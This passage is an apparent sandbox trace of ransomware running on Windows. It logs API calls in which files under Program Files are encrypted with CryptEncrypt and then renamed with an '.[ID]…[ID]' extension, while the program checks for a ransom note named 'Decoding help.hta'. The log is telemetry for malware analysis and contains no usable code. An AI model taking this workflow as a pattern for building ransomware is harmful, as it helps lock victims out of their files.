dwNumberOfBytesToMap=0x12800) returned 0x510000 [0039.080] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x440fbe4*, pdwDataLen=0x440fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x440fbe4*, pdwDataLen=0x440fcf8*=0x100) returned 1 [0039.080] CryptEncrypt (in: hKey=0x5a52f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x510000, pdwDataLen=0x440fce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x510000*, pdwDataLen=0x440fce4*=0x12800) returned 1 [0039.081] UnmapViewOfFile (lpBaseAddress=0x510000) returned 1 [0039.082] CloseHandle (hObject=0x188) returned 1 [0039.082] CryptDestroyKey (hKey=0x5a52f0) returned 1 [0039.082] CryptReleaseContext (hProv=0x5a7c68, dwFlags=0x0) returned 1 [0039.082] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.082] WriteFile (in: hFile=0x1a8, lpBuffer=0x440fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x440fcf8, lpOverlapped=0x0 | out: lpBuffer=0x440fbe4*, lpNumberOfBytesWritten=0x440fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.083] WriteFile (in: hFile=0x1a8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x440fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x440fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.083] CloseHandle (hObject=0x1a8) returned 1 [0039.084] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\maximize.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.085] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bdd9df, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bdd9df, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa800, dwReserved0=0x0, dwReserved1=0x0, cFileName="offset.ax", cAlternateFileName="")) returned 1 [0039.085] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.085] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.085] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.085] lstrcmpiW (lpString1="Decoding help.hta", lpString2="offset.ax") returned -1 [0039.085] lstrlenW (lpString="offset.ax") returned 9 [0039.085] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.085] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="offset.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax" [0039.085] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax" [0039.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax.[ID]g9uZrLhJaygpwRm1[ID]" [0039.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax" (normalized: "c:\\program files\\dvd maker\\offset.ax"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\offset.ax.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.085] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0eb1404, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe46400, dwReserved0=0x0, dwReserved1=0x0, cFileName="OmdBase.dll", cAlternateFileName="")) returned 1 [0039.085] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.085] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.085] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.085] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.085] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OmdBase.dll") returned -1 [0039.085] lstrlenW (lpString="OmdBase.dll") returned 11 [0039.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.086] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="OmdBase.dll" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll") returned="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll" [0039.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll") returned="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll" [0039.086] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll" (normalized: "c:\\program files\\dvd maker\\omdbase.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\omdbase.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.097] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0efd6c5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0efd6c5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb102e1c7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x432600, dwReserved0=0x0, dwReserved1=0x0, cFileName="OmdProject.dll", cAlternateFileName="")) returned 1 [0039.097] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.097] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OmdProject.dll") returned -1 [0039.097] lstrlenW (lpString="OmdProject.dll") returned 14 [0039.097] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="OmdProject.dll" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll") returned="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll" [0039.097] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll") returned="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll" [0039.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.097] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll" (normalized: "c:\\program files\\dvd maker\\omdproject.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\omdproject.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.097] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0b6b5be, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0b6b5be, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bb787f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1c4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pipeline.dll", cAlternateFileName="")) returned 1 [0039.097] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.097] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.098] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.098] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Pipeline.dll") returned -1 [0039.098] lstrlenW (lpString="Pipeline.dll") returned 12 [0039.098] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.098] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.098] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Pipeline.dll" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll" [0039.098] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll" [0039.098] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.098] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll" (normalized: "c:\\program files\\dvd maker\\pipeline.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\pipeline.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.105] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b5c53e, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xc7b5c53e, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x43aceae0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1cc000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PipeTran.dll", cAlternateFileName="")) returned 1 [0039.105] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.106] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.106] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.106] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PipeTran.dll") returned -1 [0039.106] lstrlenW (lpString="PipeTran.dll") returned 12 [0039.106] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.106] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.106] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="PipeTran.dll" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll") returned="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll" [0039.106] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll") returned="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll" [0039.106] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0039.106] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll" (normalized: "c:\\program files\\dvd maker\\pipetran.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\pipetran.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.119] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0eb1404, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0eb1404, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0eb1404, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13400, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtstreamsink.ax", cAlternateFileName="")) returned 1 [0039.119] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.119] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.119] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.119] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.119] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rtstreamsink.ax") returned -1 [0039.119] lstrlenW (lpString="rtstreamsink.ax") returned 15 [0039.119] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.119] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.119] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="rtstreamsink.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax" [0039.119] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax" [0039.119] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax.[ID]g9uZrLhJaygpwRm1[ID]" [0039.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsink.ax"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\rtstreamsink.ax.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.120] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtstreamsource.ax", cAlternateFileName="")) returned 1 [0039.120] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.120] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.120] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.120] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.120] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rtstreamsource.ax") returned -1 [0039.120] lstrlenW (lpString="rtstreamsource.ax") returned 17 [0039.120] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.120] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.120] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="rtstreamsource.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax" [0039.120] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax") returned="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax" [0039.120] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax.[ID]g9uZrLhJaygpwRm1[ID]" [0039.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsource.ax"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\rtstreamsource.ax.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.136] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd55c168a, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xd55c168a, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x18208, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecretST.TTF", cAlternateFileName="")) returned 1 [0039.136] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.136] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.136] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" [0039.137] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\decoding help.hta")) returned 0x1 [0039.137] lstrcmpiW (lpString1="Decoding help.hta", lpString2="SecretST.TTF") returned -1 [0039.137] lstrlenW (lpString="SecretST.TTF") returned 12 [0039.137] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.137] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned 34 [0039.137] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\", lpString2="SecretST.TTF" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF") returned="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF" [0039.137] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF") returned="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF" [0039.137] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF.[ID]g9uZrLhJaygpwRm1[ID]" [0039.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF" (normalized: "c:\\program files\\dvd maker\\secretst.ttf"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\secretst.ttf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.137] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x440fd30 | out: lpFindFileData=0x440fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shared", cAlternateFileName="")) returned 1 [0039.137] lstrcmpW (lpString1=".", lpString2="Shared") returned -1 [0039.137] lstrcmpW (lpString1="..", lpString2="Shared") returned -1 [0039.137] lstrcmpiW (lpString1="windows", lpString2="Shared") returned 1 [0039.138] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\*.*" [0039.139] 